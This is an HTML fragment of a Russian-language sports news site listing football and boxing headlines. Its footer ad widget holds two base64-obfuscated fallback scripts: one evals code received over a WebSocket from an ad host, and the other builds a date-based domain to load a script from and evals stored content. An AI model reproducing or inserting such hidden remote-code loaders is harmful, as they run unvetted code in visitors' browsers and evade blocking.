alt=""/></span></a></div><div class="post-mask-overlay"></div><div class="post-cat-info is-absolute is-light-text"><a class="cat-info-el cat-info-id-1" href="https://euro.com.ua/football/" title="Футбол">Футбол</a></div></div></div><!--post header--><div class="post-body"><h2 class="post-title entry-title is-size-4"><a class="post-title-link" href="https://euro.com.ua/football/2019/12/30/neimar-razdrajen-iz-za-skandala-v-ykraine/" rel="bookmark" title="Неймар раздражен из-за скандала в Украине">Неймар раздражен из-за скандала в Украине</a></h2><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-date"><i class="icon-simple icon-clock"></i><time class="date published" datetime="2019-12-30T16:14:05+00:00">30.12.2019</time></span><!--meta info date--></div></div></div><!--post body--></article></div><div class="post-outer ruby-col-5"><article class="post-wrap post-grid post-grid-3"><div class="post-header"><div class="post-thumb-outer ruby-animated-image ruby-fade"><div class="post-thumb is-image"><a href="https://euro.com.ua/box/2019/12/26/kybinskogo-boksera-zastrelili-v-ssha-posle-poedinka/" title="Кубинского боксера застрелили в США после поединка" rel="bookmark"><span class="thumbnail-resize"><img width="272" height="170" src="https://euro.com.ua/wp-content/uploads/2019/12/d1db43ffdb5f224597339bfe1843c405-272x170.jpg" srcset="https://euro.com.ua/wp-content/uploads/2019/12/d1db43ffdb5f224597339bfe1843c405-272x170.jpg 768w, https://euro.com.ua/wp-content/uploads/2019/12/d1db43ffdb5f224597339bfe1843c405-100x65.jpg 767w" sizes="(max-width: 767px) 33vw, 768px" alt=""/></span></a></div><div class="post-mask-overlay"></div><div class="post-cat-info is-absolute is-light-text"><a class="cat-info-el cat-info-id-5" href="https://euro.com.ua/box/" title="Бокс">Бокс</a></div></div></div><!--post header--><div class="post-body"><h2 class="post-title entry-title is-size-4"><a class="post-title-link" href="https://euro.com.ua/box/2019/12/26/kybinskogo-boksera-zastrelili-v-ssha-posle-poedinka/" rel="bookmark" title="Кубинского боксера застрелили в США после поединка">Кубинского боксера застрелили в США после поединка</a></h2><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-date"><i class="icon-simple icon-clock"></i><time class="date published" datetime="2019-12-26T08:15:03+00:00">26.12.2019</time></span><!--meta info date--></div></div></div><!--post body--></article></div><div class="post-outer ruby-col-5"><article class="post-wrap post-grid post-grid-3"><div class="post-header"><div class="post-thumb-outer ruby-animated-image ruby-fade"><div class="post-thumb is-image"><a href="https://euro.com.ua/box/2019/12/24/the-ring-nazval-lychshii-nokayt-2019-goda/" title="The Ring назвал лучший нокаут 2019 года" rel="bookmark"><span class="thumbnail-resize"><img width="272" height="170" src="https://euro.com.ua/wp-content/uploads/2019/12/4d78a53b4a7f9cff6a71a8e291ef01b5.jpeg-272x170.jpg" srcset="https://euro.com.ua/wp-content/uploads/2019/12/4d78a53b4a7f9cff6a71a8e291ef01b5.jpeg-272x170.jpg 768w, https://euro.com.ua/wp-content/uploads/2019/12/4d78a53b4a7f9cff6a71a8e291ef01b5.jpeg-100x65.jpg 767w" sizes="(max-width: 767px) 33vw, 768px" alt=""/></span></a></div><div class="post-mask-overlay"></div><div class="post-cat-info is-absolute is-light-text"><a class="cat-info-el cat-info-id-5" href="https://euro.com.ua/box/" title="Бокс">Бокс</a></div></div></div><!--post header--><div class="post-body"><h2 class="post-title entry-title is-size-4"><a class="post-title-link" href="https://euro.com.ua/box/2019/12/24/the-ring-nazval-lychshii-nokayt-2019-goda/" rel="bookmark" title="The Ring назвал лучший нокаут 2019 года">The Ring назвал лучший нокаут 2019 года</a></h2><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-date"><i class="icon-simple icon-clock"></i><time class="date published" datetime="2019-12-24T23:06:01+00:00">24.12.2019</time></span><!--meta info date--></div></div></div><!--post body--></article></div><div class="post-outer ruby-col-5"><article class="post-wrap post-grid post-grid-3"><div class="post-header"><div class="post-thumb-outer ruby-animated-image ruby-fade"><div class="post-thumb is-image"><a href="https://euro.com.ua/football/2019/12/26/asist-malinovskogo-svel-s-yma-italiancev-video/" title="Асист Малиновского свел с ума итальянцев (ВИДЕО)" rel="bookmark"><span class="thumbnail-resize"><img width="272" height="170" src="https://euro.com.ua/wp-content/uploads/2019/12/f4e14570ecc4fd27a8ba161b23c5d350-272x170.jpg" srcset="https://euro.com.ua/wp-content/uploads/2019/12/f4e14570ecc4fd27a8ba161b23c5d350-272x170.jpg 768w, https://euro.com.ua/wp-content/uploads/2019/12/f4e14570ecc4fd27a8ba161b23c5d350-100x65.jpg 767w" sizes="(max-width: 767px) 33vw, 768px" alt=""/></span></a></div><div class="post-mask-overlay"></div><div class="post-cat-info is-absolute is-light-text"><a class="cat-info-el cat-info-id-1" href="https://euro.com.ua/football/" title="Футбол">Футбол</a></div></div></div><!--post header--><div class="post-body"><h2 class="post-title entry-title is-size-4"><a class="post-title-link" href="https://euro.com.ua/football/2019/12/26/asist-malinovskogo-svel-s-yma-italiancev-video/" rel="bookmark" title="Асист Малиновского свел с ума итальянцев (ВИДЕО)">Асист Малиновского свел с ума итальянцев (ВИДЕО)</a></h2><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-date"><i class="icon-simple icon-clock"></i><time class="date published" datetime="2019-12-26T05:08:02+00:00">26.12.2019</time></span><!--meta info date--></div></div></div><!--post body--></article></div><div class="post-outer ruby-col-5"><article class="post-wrap post-grid post-grid-3"><div class="post-header"><div class="post-thumb-outer ruby-animated-image ruby-fade"><div class="post-thumb is-image"><a href="https://euro.com.ua/football/2019/12/28/rysin-ia-prishel-v-dinamo-chtoby-stat-liderom-komandy/" title="Русин: Я пришел в &#8220;Динамо&#8221;, чтобы стать лидером команды" rel="bookmark"><span class="thumbnail-resize"><img width="272" height="170" src="https://euro.com.ua/wp-content/uploads/2019/12/fbc62f5529054999dafa0c57c1c1740f-272x170.jpg" srcset="https://euro.com.ua/wp-content/uploads/2019/12/fbc62f5529054999dafa0c57c1c1740f-272x170.jpg 768w, https://euro.com.ua/wp-content/uploads/2019/12/fbc62f5529054999dafa0c57c1c1740f-100x65.jpg 767w" sizes="(max-width: 767px) 33vw, 768px" alt=""/></span></a></div><div class="post-mask-overlay"></div><div class="post-cat-info is-absolute is-light-text"><a class="cat-info-el cat-info-id-1" href="https://euro.com.ua/football/" title="Футбол">Футбол</a></div></div></div><!--post header--><div class="post-body"><h2 class="post-title entry-title is-size-4"><a class="post-title-link" href="https://euro.com.ua/football/2019/12/28/rysin-ia-prishel-v-dinamo-chtoby-stat-liderom-komandy/" rel="bookmark" title="Русин: Я пришел в &#8220;Динамо&#8221;, чтобы стать лидером команды">Русин: Я пришел в &#8220;Динамо&#8221;, чтобы стать лидером команды</a></h2><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-date"><i class="icon-simple icon-clock"></i><time class="date published" datetime="2019-12-28T18:20:02+00:00">28.12.2019</time></span><!--meta info date--></div></div></div><!--post body--></article></div><div class="post-outer ruby-col-5"><article class="post-wrap post-grid post-grid-3"><div class="post-header"><div class="post-thumb-outer ruby-animated-image ruby-fade"><div class="post-thumb is-image"><a href="https://euro.com.ua/box/2019/12/29/devis-gamboa-video-boia/" title="Дэвис &#8211; Гамбоа: видео боя" rel="bookmark"><span class="thumbnail-resize"><img width="272" height="170" src="https://euro.com.ua/wp-content/uploads/2019/12/faf515f990e653b3e833a8cae4bf5d4e-272x170.jpg" srcset="https://euro.com.ua/wp-content/uploads/2019/12/faf515f990e653b3e833a8cae4bf5d4e-272x170.jpg 768w, https://euro.com.ua/wp-content/uploads/2019/12/faf515f990e653b3e833a8cae4bf5d4e-100x65.jpg 767w" sizes="(max-width: 767px) 33vw, 768px" alt=""/></span></a></div><div class="post-mask-overlay"></div><div class="post-cat-info is-absolute is-light-text"><a class="cat-info-el cat-info-id-5" href="https://euro.com.ua/box/" title="Бокс">Бокс</a></div></div></div><!--post header--><div class="post-body"><h2 class="post-title entry-title is-size-4"><a class="post-title-link" href="https://euro.com.ua/box/2019/12/29/devis-gamboa-video-boia/" rel="bookmark" title="Дэвис &#8211; Гамбоа: видео боя">Дэвис &#8211; Гамбоа: видео боя</a></h2><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-date"><i class="icon-simple icon-clock"></i><time class="date published" datetime="2019-12-29T10:12:00+00:00">29.12.2019</time></span><!--meta info date--></div></div></div><!--post body--></article></div><div class="post-outer ruby-col-5"><article class="post-wrap post-grid post-grid-3"><div class="post-header"><div class="post-thumb-outer ruby-animated-image ruby-fade"><div class="post-thumb is-image"><a href="https://euro.com.ua/football/2019/12/27/shahter-vedet-dvyh-portygalcev-izmeneniia-dlia-grigorchyka/" title="&#8220;Шахтер&#8221; ведет двух португальцев, изменения для Григорчука" rel="bookmark"><span class="thumbnail-resize"><img width="272" height="170" src="https://euro.com.ua/wp-content/uploads/2019/12/f1ad641796fefbaadeec7159f73190d5-272x170.jpg" srcset="https://euro.com.ua/wp-content/uploads/2019/12/f1ad641796fefbaadeec7159f73190d5-272x170.jpg 768w, https://euro.com.ua/wp-content/uploads/2019/12/f1ad641796fefbaadeec7159f73190d5-100x65.jpg 767w" sizes="(max-width: 767px) 33vw, 768px" alt=""/></span></a></div><div class="post-mask-overlay"></div><div class="post-cat-info is-absolute is-light-text"><a class="cat-info-el cat-info-id-1" href="https://euro.com.ua/football/" title="Футбол">Футбол</a></div></div></div><!--post header--><div class="post-body"><h2 class="post-title entry-title is-size-4"><a class="post-title-link" href="https://euro.com.ua/football/2019/12/27/shahter-vedet-dvyh-portygalcev-izmeneniia-dlia-grigorchyka/" rel="bookmark" title="&#8220;Шахтер&#8221; ведет двух португальцев, изменения для Григорчука">&#8220;Шахтер&#8221; ведет двух португальцев, изменения для Григорчука</a></h2><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-date"><i class="icon-simple icon-clock"></i><time class="date published" datetime="2019-12-27T09:11:15+00:00">27.12.2019</time></span><!--meta info date--></div></div></div><!--post body--></article></div><div class="post-outer ruby-col-5"><article class="post-wrap post-grid post-grid-3"><div class="post-header"><div class="post-thumb-outer ruby-animated-image ruby-fade"><div class="post-thumb is-image"><a href="https://euro.com.ua/football/2019/12/25/eks-zashhitnik-dinamo-prodolzhit-kareru-vo-vtorom-divizione-chempionata-yaponii/" title="Экс-защитник Динамо продолжит карьеру во втором дивизионе чемпионата Японии" rel="bookmark"><span class="thumbnail-resize"><img width="272" height="170" src="https://euro.com.ua/wp-content/uploads/2018/12/Pantich-272x170.jpg" srcset="https://euro.com.ua/wp-content/uploads/2018/12/Pantich-272x170.jpg 768w, https://euro.com.ua/wp-content/uploads/2018/12/Pantich-100x65.jpg 767w" sizes="(max-width: 767px) 33vw, 768px" alt="Пантич"/></span></a></div><div class="post-mask-overlay"></div><div class="post-cat-info is-absolute is-light-text"><a class="cat-info-el cat-info-id-1" href="https://euro.com.ua/football/" title="Футбол">Футбол</a></div></div></div><!--post header--><div class="post-body"><h2 class="post-title entry-title is-size-4"><a class="post-title-link" href="https://euro.com.ua/football/2019/12/25/eks-zashhitnik-dinamo-prodolzhit-kareru-vo-vtorom-divizione-chempionata-yaponii/" rel="bookmark" title="Экс-защитник Динамо продолжит карьеру во втором дивизионе чемпионата Японии">Экс-защитник Динамо продолжит карьеру во втором дивизионе чемпионата Японии</a></h2><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-date"><i class="icon-simple icon-clock"></i><time class="date published" datetime="2019-12-25T13:05:17+00:00">25.12.2019</time><time class="updated" datetime="2019-12-25T13:05:18+02:00">25.12.2019</time></span><!--meta info date--></div></div></div><!--post body--></article></div></div></div></div></div></article></div></div><div class="single-post-infinite-icon clearfix"><div class="ajax-animation"><span class="ajax-animation-icon"></span></div></div><!--single infinite-->
<div id="ruby-footer" class="footer-wrap footer-style-1 is-light-text">

	<div class="top-footer-wrap">
	<div class="top-footer-inner">
		<section id="custom_html-5" class="widget_text widget widget_custom_html"><div class="textwidget custom-html-widget"><script class="r36577" type="text/javascript">
    (function() {
        var worker36577,
            tickerID = 36577,
            tag = document.currentScript || (function() {
                var scripts = document.getElementsByClassName('r36577'),
                    len = scripts.length;
                return len ? scripts[len - 1] : null;
            })(),
            idn = (function() {
                var i, num, chars = "abcdefghiklmnopqrstuvwxyz",
                    len = Math.floor((Math.random() * 2) + 4),
                    idn = '';
                for (i = 0; i < len; i++) {
                    num = Math.floor(Math.random() * chars.length);
                    idn += chars.substring(num, num + 1);
                }
                return idn;
            })();
        
        var container = document.createElement('div');
            container.id = idn;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.setAttribute('class', 's36577');
            script.setAttribute('data-idn', idn);
            script.src = '//v1r7on.news/ru-n4p/0/36/ticker_36577.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

                var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9uNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';

                function runExternalMessage(data) {
                    worker36577.postMessage(data);
                }

                worker36577 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker36577.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker36577.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
</script>

          <div id="MIXADV_5498" class="MIXADVERT_NET"></div>
          <script> 
          var node5498 = document.getElementById("MIXADV_5498");
          if( node5498 )
          {
               var script = document.createElement("script");
               script.charset = "utf-8";
               script.src = "https://m.mixadvert.com/show/?id=5498&r="+Math.random();
               node5498.parentNode.appendChild(script); 
               script.onerror = function(){
                  window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgInBybyIsICJ0b3AiLCAiaW5mbyIsICJvbmxpbmUiLCAic3BhY2UiLCAic2l0ZSIsICJ0ZWNoIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDU0OTggLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlNTQ5OC5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTU0OTguaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjU0OTgiKSkgfSwgNTAwMCk7ICA7fTsg") );
              }
          }
          </script>
                  </div></section>	</div>
</div><!--top footer-->

	<div class="footer-inner">
				
<div class="footer-social-wrap bar-with-logo">
	<div class="ruby-container">
		<div class="footer-social-inner clearfix">
							<div class="footer-logo">
					<a href="https://euro.com.ua/" class="footer-logo-link" title="Свежие новости спорта">
						<img src="https://euro.com.ua/wp-content/uploads/2018/11/logoeurocomua-f.png" height="57" width="280"  alt="Свежие новости спорта">
					</a>
				</div>
										<div class="footer-about-us entry">
					© 2007-2018 EURO.com.ua. Использование материалов разрешается при условии активной обратной гиперссылки на EURO.com.ua (без переадресации). Все материалы на данном сайте взяты из открытых источников - имеют обратную ссылку на материал в интернете или присланы посетителями сайта и предоставляются исключительно в ознакомительных целях. Права на материалы принадлежат их владельцам. Администрация сайта ответственности за содержание материала не несет.				</div>
			
			
			
										<div class="social-icon-wrap social-icon-dark tooltips">
								<a class="icon-facebook" title="facebook" href="https://www.facebook.com/eurocomu/" target="_blank"><i class="fa fa-facebook" aria-hidden="true"></i></a><a class="icon-twitter" title="twitter" href="https://twitter.com/euro_com_ua" target="_blank"><i class="fa fa-twitter" aria-hidden="true"></i></a><a class="icon-vk" title="vkontakte" href="https://vk.com/eurocomua" target="_blank"><i class="fa fa-vk" aria-hidden="true"></i></a>				</div>
								</div>
	</div>
</div><!--footer social wrap -->	</div><!--footer inner-->
	
<div id="ruby-copyright" class="footer-copyright-wrap copyright-with-nav">
	<div class="ruby-container">
		<div class="copyright-inner clearfix">

			
							<div id="ruby-footer-menu" class="footer-menu-wrap">

															<div class="menu-footer-menu-container"><ul id="footer-menu" class="footer-menu-inner"><li id="menu-item-1735" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1735"><a href="https://euro.com.ua/about/">О нас</a></li>
<li id="menu-item-1732" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1732"><a href="https://euro.com.ua/copyright-tekedown/">Правообладателям</a></li>
<li id="menu-item-1734" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1734"><a href="https://euro.com.ua/sitemap/">Карта сайта</a></li>
<li id="menu-item-1731" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1731"><a href="https://euro.com.ua/feedback/">Контакты</a></li>
</ul></div>									</div>
					</div>
	</div>
</div>

</div></div>

<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNkqAcAAIUAgUW0RjgAAAAASUVORK5CYII=" height="0" width="0" alt="f7f87794" />
</div>
</div><!--site outer-->
<script type='text/javascript' src='https://euro.com.ua/wp-content/plugins/newsmax-core/assets/script.js?ver=1.5'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wpcf7 = {"apiSettings":{"root":"https:\/\/euro.com.ua\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"}};
/* ]]> */
</script>
<script type='text/javascript' src='https://euro.com.ua/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.6'></script>
<script type='text/javascript' src='https://euro.com.ua/wp-includes/js/comment-reply.min.js?ver=39357509287b6196d3fd6c28e8a15c32'></script>
<script type='text/javascript' src='https://euro.com.ua/wp-content/themes/newsmax/assets/external/modernizr.min.js?ver=v2.8.3'></script>
<script type='text/javascript' src='https://euro.com.ua/wp-content/themes/newsmax/assets/external/jquery.ui.totop.min.js?ver=v1.2'></script>
<script type='text/javascript' src='https://euro.com.ua/wp-includes/js/imagesloaded.min.js?ver=3.2.0'></script>
<script type='text/javascript' src='https://euro.com.ua/wp-content/themes/newsmax/assets/external/jquery.waypoints.min.js?ver=v3.1.1'></script>
<script type='text/javascript' src='https://euro.com.ua/wp-content/themes/newsmax/assets/external/slick.min.js?ver=v1.6.0'></script>
<script type='text/javascript' src='https://euro.com.ua/wp-content/themes/newsmax/assets/external/jquery.tipsy.min.js?ver=v1.0'></script>
<script type='text/javascript' src='https://euro.com.ua/wp-content/themes/newsmax/assets/external/jquery.magnific-popup.min.js?ver=v1.1.0'></script>
<script type='text/javascript' src='https://euro.com.ua/wp-content/themes/newsmax/assets/external/jquery.justifiedGallery.min.js?ver=v3.6.0'></script>
<script type='text/javascript' src='https://euro.com.ua/wp-content/themes/newsmax/assets/external/jquery.backstretch.min.js?ver=v2.0.4'></script>
<script type='text/javascript' src='https://euro.com.ua/wp-content/themes/newsmax/assets/external/smoothscroll.min.js?ver=v1.2.1'></script>
<script type='text/javascript' src='https://euro.com.ua/wp-content/themes/newsmax/assets/external/jquery.fitvids.min.js?ver=v1.1'></script>
<script type='text/javascript' src='https://euro.com.ua/wp-content/themes/newsmax/assets/external/jquery.sticky.min.js?ver=v1.0.3'></script>
<script type='text/javascript' src='https://euro.com.ua/wp-content/themes/newsmax/assets/external/jquery.ruby-sticky.min.js?ver=1.0'></script>
<script type='text/javascript' src='https://euro.com.ua/wp-content/themes/newsmax/assets/js/global.js?ver=1.8'></script>
<script type='text/javascript' src='https://euro.com.ua/wp-includes/js/wp-embed.min.js?ver=39357509287b6196d3fd6c28e8a15c32'></script>
<div id="upprev_box"><h6>Подробнее в <a href="https://euro.com.ua/box/" rel="Усик: Нашел нормального тренера, когда стал чемпионом мира">Бокс</a></h6><div class="upprev_excerpt upprev_space upprev_thumbnail"><a href="https://euro.com.ua/box/2020/01/02/arym-djoshya-zavershit-karery-v-2020-gody/" title="Арум: Джошуа завершит карьеру в 2020 году" class="upprev_thumbnail" rel="Усик: Нашел нормального тренера, когда стал чемпионом мира"><img width="48" height="29" src="https://euro.com.ua/wp-content/uploads/2020/01/052662256283808ff3bcc70bc1c51f1a.jpg" class="iworks_upprev_thumb wp-post-image" alt="" title="Арум: Джошуа завершит карьеру в 2020 году" srcset="https://euro.com.ua/wp-content/uploads/2020/01/052662256283808ff3bcc70bc1c51f1a.jpg 630w, https://euro.com.ua/wp-content/uploads/2020/01/052662256283808ff3bcc70bc1c51f1a-300x180.jpg 300w, https://euro.com.ua/wp-content/uploads/2020/01/052662256283808ff3bcc70bc1c51f1a-364x225.jpg 364w, https://euro.com.ua/wp-content/uploads/2020/01/052662256283808ff3bcc70bc1c51f1a-272x170.jpg 272w" sizes="(max-width: 48px) 100vw, 48px" /></a><h5><a href="https://euro.com.ua/box/2020/01/02/arym-djoshya-zavershit-karery-v-2020-gody/" rel="Усик: Нашел нормального тренера, когда стал чемпионом мира">Арум: Джошуа завершит карьеру в 2020 году</a></h5><br /></div><div class="upprev_excerpt upprev_space upprev_thumbnail"><a href="https://euro.com.ua/box/2020/01/02/lomachenko-devis-i-meivezer-v-bokse-radi-deneg/" title="Ломаченко: Дэвис и Мейвезер в боксе ради денег" class="upprev_thumbnail" rel="Усик: Нашел нормального тренера, когда стал чемпионом мира"><img width="48" height="29" src="https://euro.com.ua/wp-content/uploads/2020/01/938770574725f927c2c8f11c6893f168.jpg" class="iworks_upprev_thumb wp-post-image" alt="" title="Ломаченко: Дэвис и Мейвезер в боксе ради денег" srcset="https://euro.com.ua/wp-content/uploads/2020/01/938770574725f927c2c8f11c6893f168.jpg 630w, https://euro.com.ua/wp-content/uploads/2020/01/938770574725f927c2c8f11c6893f168-300x180.jpg 300w, https://euro.com.ua/wp-content/uploads/2020/01/938770574725f927c2c8f11c6893f168-364x225.jpg 364w, https://euro.com.ua/wp-content/uploads/2020/01/938770574725f927c2c8f11c6893f168-272x170.jpg 272w" sizes="(max-width: 48px) 100vw, 48px" /></a><h5><a href="https://euro.com.ua/box/2020/01/02/lomachenko-devis-i-meivezer-v-bokse-radi-deneg/" rel="Усик: Нашел нормального тренера, когда стал чемпионом мира">Ломаченко: Дэвис и Мейвезер в боксе ради денег</a></h5><br /></div><div class="upprev_excerpt upprev_space upprev_thumbnail"><a href="https://euro.com.ua/box/2020/01/02/pakiao-stal-avtorom-neveroiatnogo-rekorda/" title="Пакьяо стал автором невероятного рекорда" class="upprev_thumbnail" rel="Усик: Нашел нормального тренера, когда стал чемпионом мира"><img width="48" height="29" src="https://euro.com.ua/wp-content/uploads/2020/01/e3ddf23be99c406e0df483f0aedf64be.png" class="iworks_upprev_thumb wp-post-image" alt="" title="Пакьяо стал автором невероятного рекорда" srcset="https://euro.com.ua/wp-content/uploads/2020/01/e3ddf23be99c406e0df483f0aedf64be.png 630w, https://euro.com.ua/wp-content/uploads/2020/01/e3ddf23be99c406e0df483f0aedf64be-300x180.png 300w, https://euro.com.ua/wp-content/uploads/2020/01/e3ddf23be99c406e0df483f0aedf64be-364x225.png 364w, https://euro.com.ua/wp-content/uploads/2020/01/e3ddf23be99c406e0df483f0aedf64be-272x170.png 272w" sizes="(max-width: 48px) 100vw, 48px" /></a><h5><a href="https://euro.com.ua/box/2020/01/02/pakiao-stal-avtorom-neveroiatnogo-rekorda/" rel="Усик: Нашел нормального тренера, когда стал чемпионом мира">Пакьяо стал автором невероятного рекорда</a></h5><br /></div><div class="upprev_excerpt upprev_space upprev_thumbnail"><a href="https://euro.com.ua/box/2020/01/01/dva-poedinka-ykraincev-stali-lychshimi-v-2019-gody/" title="Два поединка украинцев стали лучшими в 2019 году" class="upprev_thumbnail" rel="Усик: Нашел нормального тренера, когда стал чемпионом мира"><img width="48" height="29" src="https://euro.com.ua/wp-content/uploads/2020/01/0164cd4ab0c581efacad2ebfdcff1bd9.jpg" class="iworks_upprev_thumb wp-post-image" alt="" title="Два поединка украинцев стали лучшими в 2019 году" srcset="https://euro.com.ua/wp-content/uploads/2020/01/0164cd4ab0c581efacad2ebfdcff1bd9.jpg 630w, https://euro.com.ua/wp-content/uploads/2020/01/0164cd4ab0c581efacad2ebfdcff1bd9-300x180.jpg 300w, https://euro.com.ua/wp-content/uploads/2020/01/0164cd4ab0c581efacad2ebfdcff1bd9-364x225.jpg 364w, https://euro.com.ua/wp-content/uploads/2020/01/0164cd4ab0c581efacad2ebfdcff1bd9-272x170.jpg 272w" sizes="(max-width: 48px) 100vw, 48px" /></a><h5><a href="https://euro.com.ua/box/2020/01/01/dva-poedinka-ykraincev-stali-lychshimi-v-2019-gody/" rel="Усик: Нашел нормального тренера, когда стал чемпионом мира">Два поединка украинцев стали лучшими в 2019 году</a></h5><br /></div><div class="upprev_excerpt upprev_thumbnail"><a href="https://euro.com.ua/box/2020/01/01/djoshya-ia-ne-bous-yaildera-hotia-on-opasen/" title="Джошуа: Я не боюсь Уайлдера, хотя он опасен" class="upprev_thumbnail" rel="Усик: Нашел нормального тренера, когда стал чемпионом мира"><img width="48" height="29" src="https://euro.com.ua/wp-content/uploads/2020/01/4f5392ba083e844af11299183840dd78.jpg" class="iworks_upprev_thumb wp-post-image" alt="" title="Джошуа: Я не боюсь Уайлдера, хотя он опасен" srcset="https://euro.com.ua/wp-content/uploads/2020/01/4f5392ba083e844af11299183840dd78.jpg 630w, https://euro.com.ua/wp-content/uploads/2020/01/4f5392ba083e844af11299183840dd78-300x180.jpg 300w, https://euro.com.ua/wp-content/uploads/2020/01/4f5392ba083e844af11299183840dd78-364x225.jpg 364w, https://euro.com.ua/wp-content/uploads/2020/01/4f5392ba083e844af11299183840dd78-272x170.jpg 272w" sizes="(max-width: 48px) 100vw, 48px" /></a><h5><a href="https://euro.com.ua/box/2020/01/01/djoshya-ia-ne-bous-yaildera-hotia-on-opasen/" rel="Усик: Нашел нормального тренера, когда стал чемпионом мира">Джошуа: Я не боюсь Уайлдера, хотя он опасен</a></h5><br /></div><a id="upprev_close" href="#" rel="close">Закрыть</a></div></body>
</html>